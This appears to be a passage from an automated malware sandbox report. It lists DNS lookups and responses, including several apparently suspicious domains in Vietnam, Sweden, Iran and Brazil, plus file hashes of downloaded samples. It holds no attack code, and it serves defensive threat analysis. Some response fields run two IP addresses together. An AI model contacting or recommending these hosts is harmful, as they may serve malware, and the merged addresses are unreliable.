73 B 143 B 1 1
DNS Request
237.197.79.204.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
194.61.62.23.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
43.58.199.20.in-addr.arpa
-
70 B 156 B 1 1
DNS Request
94.65.42.20.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
183.142.211.20.in-addr.arpa
-
79 B 231 B 1 1
DNS Request
metadata.templates.cdn.office.net
DNS Response
23.62.61.16223.62.61.184
-
79 B 202 B 1 1
DNS Request
binaries.templates.cdn.office.net
DNS Response
2.17.251.232.17.251.32
-
71 B 135 B 1 1
DNS Request
162.61.62.23.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
23.251.17.2.in-addr.arpa
-
69 B 85 B 1 1
DNS Request
viettellogistics.com.vn
DNS Response
171.244.51.31
-
72 B 161 B 1 1
DNS Request
31.51.244.171.in-addr.arpa
-
56 B 72 B 1 1
DNS Request
cococat.se
DNS Response
185.189.51.191
-
73 B 102 B 1 1
DNS Request
191.51.189.185.in-addr.arpa
-
60 B 76 B 1 1
DNS Request
andresirjan.ir
DNS Response
89.42.208.212
-
72 B 99 B 1 1
DNS Request
212.208.42.89.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
103.169.127.40.in-addr.arpa
-
60 B 76 B 1 1
DNS Request
sptrade.com.br
DNS Response
185.239.210.245
-
72 B 158 B 1 1
DNS Request
171.39.242.20.in-addr.arpa
-
74 B 134 B 1 1
DNS Request
245.210.239.185.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
91.90.14.23.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
55.36.223.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
48.229.111.52.in-addr.arpa
-
62 B 173 B 1 1
DNS Request
tse1.mm.bing.net
DNS Response
204.79.197.20013.107.21.200
-
73 B 106 B 1 1
DNS Request
200.197.79.204.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82